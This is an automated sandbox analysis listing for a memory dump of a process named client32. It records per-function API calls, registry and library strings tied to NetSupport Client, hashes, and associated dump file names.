                                                                                • Opcode Fuzzy Hash: c5edebcb86b8a007a6a1af48cd80f0235394c84cf34213d7754056fe959a7dee
                                                                                • Instruction Fuzzy Hash: F7F0BB70C44BD96AFB22CE5484445867FDA4F172A9F64C4DEDCD886501D375D188CB91
                                                                                Function 110ED520 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110ED4E0: RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                • RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED53C
                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                Strings
                                                                                • Error %d Opening regkey %s, xrefs: 110ED54A
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenwvsprintf
                                                                                • String ID: Error %d Opening regkey %s
                                                                                • API String ID: 1772833024-3994271378
                                                                                • Opcode ID: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                • Instruction ID: 5f226866219d47cdc22a26dd3dbb65f90c8b83d3a621ba21e11ce4a3e0407911
                                                                                • Opcode Fuzzy Hash: be8df2ef407ba96112ec5d755a0622a5b345cfc9aa036e8a0f047f1e9bd60e61
                                                                                • Instruction Fuzzy Hash: D8E092BB6012183FD221961F9C88EEBBB2CDB916A8F01002AFE1487240D972EC00C7B0
                                                                                Function 110ED4E0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegCloseKey.KERNEL32(?,?,?,110ED52D,?,00000000,00000001,?,11030BFF,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110ED4ED
                                                                                  • Part of subcall function 110ED2B0: wvsprintfA.USER32(?,00020019,?), ref: 110ED2DB
                                                                                Strings
                                                                                • Error %d closing regkey %x, xrefs: 110ED4FD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Closewvsprintf
                                                                                • String ID: Error %d closing regkey %x
                                                                                • API String ID: 843752472-892920262
                                                                                • Opcode ID: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                • Instruction ID: 17a63c7cb3d890cd37713e3b4debf5197f9ef4f9ed7a9792908d4a56e9be20d3
                                                                                • Opcode Fuzzy Hash: 642cb265c958f950c3ad5309e5a28574da7d5c04021b5162d7a3503cde28986e
                                                                                • Instruction Fuzzy Hash: CFE08C7AA025126BE7359A2EAC18F5BBAE8DFC5314F26056EF890C7201EA70C8008764
                                                                                Function 11146FE0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(NSMTRACE,?,1102E424,11026BE0,012FB850,?,?,?,00000100,?,?,00000009), ref: 11146FF9
                                                                                  • Part of subcall function 11146270: GetModuleHandleA.KERNEL32(NSMTRACE,11195AD8), ref: 1114628A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: HandleLibraryLoadModule
                                                                                • String ID: NSMTRACE
                                                                                • API String ID: 4133054770-4175627554
                                                                                • Opcode ID: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                • Instruction ID: 05ea96992fd141bf150828de6ed923b008e63955592f075fac88204ac5220611
                                                                                • Opcode Fuzzy Hash: 149a01f821d4e18d225a109ec96b21c3577f6115cbc4ffed0645b8b98fb3f485
                                                                                • Instruction Fuzzy Hash: 57D05B76641637CFDF069FB555A0575F7E4EB0AA0D3140075E425C7A06EB61D408C751
                                                                                Function 110262C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(psapi.dll,?,11030964), ref: 110262C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: psapi.dll
                                                                                • API String ID: 1029625771-80456845
                                                                                • Opcode ID: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                • Instruction ID: e72f5ce5ea606eebe772e5127c5e47cd0fc6cc19585cdbbc80c25ff44c20045f
                                                                                • Opcode Fuzzy Hash: b8f5042798fcb06a98c932a958d15ff0d02573e45559d2e155fe0703e5da3d60
                                                                                • Instruction Fuzzy Hash: 50E009B1A01B258FC3B0CF3AA544642BAF0BB086103118A7ED0AEC3A04F330A5448F80
                                                                                Function 11015530 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102F63D,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1101553E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID: nslsp.dll
                                                                                • API String ID: 1029625771-3933918195
                                                                                • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                                • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                                • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                                Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110750EF
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLibrary_memset
                                                                                • String ID:
                                                                                • API String ID: 1654520187-0
                                                                                • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                                • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                                • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                                Function 11060820 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • std::exception::exception.LIBCMT ref: 110608C3
                                                                                • __CxxThrowException@8.LIBCMT ref: 110608D8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                • String ID:
                                                                                • API String ID: 1338273076-0
                                                                                • Opcode ID: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                                • Instruction ID: 40c1b550870c83f0c669b419c7937a1de5292af9ae005a9ffb354a33ebb971cd
                                                                                • Opcode Fuzzy Hash: 7a405ee56f1315c6ee1f340a3ff28517fdd231231b98c8aaa449bf634c5199d4
                                                                                • Instruction Fuzzy Hash: F11181BA900609AFC715CF99C840ADAF7F8FB58614F10863EE91997740E774E904CBE1
                                                                                Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc_memmove
                                                                                • String ID:
                                                                                • API String ID: 1183979061-0
                                                                                • Opcode ID: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                                • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                                • Opcode Fuzzy Hash: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                                • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                                Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 110886DF
                                                                                • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalInitializeSection_memset
                                                                                • String ID:
                                                                                • API String ID: 453477542-0
                                                                                • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                                • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                                • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                                Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                                • ExtractIconExA.SHELL32(?,00000000,000F02E5,000C0309,00000001), ref: 11145068
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExtractFileIconModuleName
                                                                                • String ID:
                                                                                • API String ID: 3911389742-0
                                                                                • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                                • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                                • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                                Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                • __lock_file.LIBCMT ref: 11164CBE
                                                                                  • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                                • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
